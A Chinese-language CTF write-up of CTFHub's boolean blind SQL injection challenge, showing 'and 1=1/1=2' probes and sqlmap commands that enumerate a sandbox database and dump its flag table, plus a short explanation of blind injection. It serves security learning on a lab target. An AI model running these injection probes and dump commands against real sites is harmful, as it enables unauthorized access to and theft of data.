CTFHub | 布尔盲注

我会带着你远行 2024-04-01 12:06 91阅读 0赞

#### 0x00 前言 ####

CTFHub 专注网络安全、信息安全、白帽子技术的在线学习，实训平台。提供优质的赛事及学习服务，拥有完善的题目环境及配套 writeup ，降低 CTF 学习入门门槛，快速帮助选手成长，跟随主流比赛潮流。

#### 0x01 题目描述 ####

> **布尔盲注：**
> 
> （无）

![8cd233b6de734452a47192ccf36bbb5f.png][] 网页显示内容

#### 0x02 解题过程 ####

根据网页显示内容输入1进行测试，此题可能存在 SQL 注入。构造 payload 验证是否属于整数型注入，确定此题为整数型注入。使用工具 sqlmap 爆出数据库名，查看数据库名中的表发现一个可疑的表名为 flag 。查看 flag 表名的字段为 flag 。检查字段中的数据发现此题 flag 。

**Ⅰ**根据网页显示内容输入1进行测试，发现此题可能存在SQL注入

![a219479966284a28acddaef271a6a6ab.png][]

**Ⅱ**在URL末尾使用'and 1=1'和'and 1=2'验证是否属于整数型注入

![2480c58d512040f09c3e85de6d4ad706.png][]

#payload
    and 1 = 1
    and 1 = 2

**Ⅲ**'and 1=1'语句正常执行，回显正常

![3089e662d07d47849a6915a6b506fb61.png][]

and 1=1

**Ⅳ**'and 1=2'语句正常执行，回显出错，说明此题存在SQL整数型注入

![e43c8d171cfb45359ff89868b28f0b70.png][]

and 1=2

**Ⅴ**使用sqlmap工具爆出数据库名和缓存页面数据，得到数据库名sqli

![bc3471a5c3d34d22b645f815dcec02ea.png][]

python3 sqlmap.py -u http://challenge-b7ba99b679c4cbfa.sandbox.ctfhub.com:10800/?id=1 --current-db

**Ⅵ**爆出刚才获得的数据库名sqli的表名，发现一个名为flag的表比较可疑

![fc3dcf38763e46bc91c48423e3b31679.png][]

python3 sqlmap.py http://challenge-b7ba99b679c4cbfa.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

**Ⅶ**爆出flag表的字段

![aab615d3a8ea45c88f28439e8efea846.png][]

python3 sqlmap.py http://challenge-b7ba99b679c4cbfa.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

**Ⅷ**查看字段中的数据，发现此题flag

![12b7e966cb794e2fad7c65e117ddfadc.png][]

python3 sqlmap.py -u http://challenge-b7ba99b679c4cbfa.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch

#### 0x03 布尔盲注 ####

**布尔类型（Boolean type)**

布尔类型只有两个值，True 和 False。通常用来判断条件是否成立。计算机里的一种数据类型，一般用于逻辑运算和比较运算。

**盲注**

盲注是指在SQL注入过程中，SQL语句执行的选择后，选择的数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。

*  web页面返回True 或者 false，构造SQL语句，利用and，or，not等关键字

#### **0x04 总结** ####

文章内容为学习记录的笔记，由于作者水平有限，文中若有错误与不足欢迎留言，便于及时更正。

[8cd233b6de734452a47192ccf36bbb5f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/7cfc28fa3e4046599a818ac3317bee78.png
[a219479966284a28acddaef271a6a6ab.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/90ba591e8fe04c4b986b8c02860aac82.png
[2480c58d512040f09c3e85de6d4ad706.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/295db6b1cc8242ceaa4960f8cc2828fa.png
[3089e662d07d47849a6915a6b506fb61.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/78bff769346c4860a6b2d3213791f15e.png
[e43c8d171cfb45359ff89868b28f0b70.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/ebd684ee96cf4164874bdf03dadcf13c.png
[bc3471a5c3d34d22b645f815dcec02ea.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/b83100e3c0534938bbb23ec0188e3942.png
[fc3dcf38763e46bc91c48423e3b31679.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/b8b760599fbe4ee8af3be7af1baebee2.png
[aab615d3a8ea45c88f28439e8efea846.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/58226260e4f24561b33333320bb26f13.png
[12b7e966cb794e2fad7c65e117ddfadc.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/8f8192480dc447a09d348fae8a46d11d.png